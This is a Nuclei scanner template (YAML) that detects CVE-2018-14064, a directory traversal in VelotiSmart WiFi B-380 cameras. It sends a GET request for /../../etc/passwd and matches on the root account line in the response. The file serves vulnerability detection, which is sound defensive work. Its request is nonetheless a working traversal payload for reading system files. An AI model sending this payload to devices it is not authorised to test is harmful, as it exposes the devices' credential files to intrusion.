nuclei-templates/cves/2018/CVE-2018-14064.yaml

34 lines
889 B
YAML

id: CVE-2018-14064
info:
name: VelotiSmart Wifi - Directory Traversal
author: 0x_Akoko
severity: critical
description: The uc-http service 1.0.0 on VelotiSmart WiFi B-380 camera devices allows Directory Traversal, as demonstrated by /../../etc/passwd on TCP port 80.
reference:
- https://medium.com/@s1kr10s/velotismart-0day-ca5056bcdcac
- https://www.exploit-db.com/exploits/45030
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14064
tags: cve,cve2018,lfi,camera,iot
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2018-14064
cwe-id: CWE-22
requests:
- method: GET
path:
- "{{BaseURL}}/../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200